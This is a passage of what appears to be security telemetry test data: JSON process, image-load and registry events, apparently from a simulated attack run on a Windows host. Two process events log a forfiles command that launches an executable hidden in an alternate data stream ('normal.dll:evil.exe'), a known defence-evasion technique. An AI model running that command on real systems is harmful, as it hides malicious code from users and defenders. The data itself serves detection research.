"image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022060000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "twinui.dll", + "image_path": "C:\\Windows\\System32\\twinui.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022150000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + 
}, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022150000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022150000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "twinui.appcore.dll", + "image_path": "C:\\Windows\\System32\\twinui.appcore.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022180000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "CoreUIComponents.dll", + "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022180000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "CoreMessaging.dll", + "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022180000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022180000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": 
"sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_value": "WindowSizing", + "timestamp": 131883574022330000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574022330000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_value": "WindowSizing", + "timestamp": 131883574022330000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": 
"Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574022330000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883574022420000, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574022420000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredLaunchWindowingMode", + "registry_value": "PreferredLaunchWindowingMode", + "timestamp": 131883574022420000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + 
{ + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_value": "WindowSizing", + "timestamp": 131883574022600000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574022600000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_value": "WindowSizing", + "timestamp": 131883574022600000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574022600000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "image_load", + "image_name": "MrmCoreR.dll", + "image_path": "C:\\Windows\\System32\\MrmCoreR.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022780000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "BCP47mrm.dll", + "image_path": "C:\\Windows\\System32\\BCP47mrm.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022780000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "Windows.UI.dll", + "image_path": "C:\\Windows\\System32\\Windows.UI.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022860000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "TextInputFramework.dll", + "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022860000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "image_load", + "image_name": "InputHost.dll", + "image_path": "C:\\Windows\\System32\\InputHost.dll", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883574022860000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": 
"calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883574022860000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\WINDOWS\\system32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883574022860000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "process", + "pid": 2616, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "subtype": "terminate", + "timestamp": 131883574022950000, + "unique_pid": 
"{42FC7E13-CC1A-5C05-0000-001055915701}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883574023050000, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883574023050000, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883574023050000, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "process", + "pid": 4500, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "subtype": "terminate", + "timestamp": 131883574023050000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program 
Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883574023050000, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState\\Mode", + "registry_value": "Mode", + "timestamp": 131883574023050000, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "process", + "pid": 5004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883574023130000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"forfiles /p c:\\windows\\system32 /m notepad.exe /c \" c:\\folder\\normal.dll:evil.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6296, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883574023260000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6296, 
+ "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574023250000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574023300000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574023300000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574023300000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574023300000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" + }, + { + "command_line": "forfiles /p c:\\windows\\system32 /m notepad.exe /c c:\\folder\\normal.dll:evil.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 524, + "ppid": 6296, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "subtype": "create", + "timestamp": 131883574023440000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}", + "unique_ppid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}", + "user": 
"ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "forfiles.exe", + "image_path": "C:\\Windows\\System32\\forfiles.exe", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023400000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023400000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023400000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023400000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": 
"{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": 
"image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023490016, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 524, + "process_name": "forfiles.exe", + "process_path": "C:\\Windows\\System32\\forfiles.exe", + "timestamp": 131883574023580000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "process", + "pid": 524, + "process_name": "forfiles.exe", + 
"process_path": "C:\\Windows\\System32\\forfiles.exe", + "subtype": "terminate", + "timestamp": 131883574023760000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" + }, + { + "event_type": "process", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883574024030000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SplashScreen", + "registry_value": "SplashScreen", + "timestamp": 131883574024210000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4248, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883574024270000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574024320000, + 
"unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574024370000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574024370000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574024370000, + "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883574024420000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + 
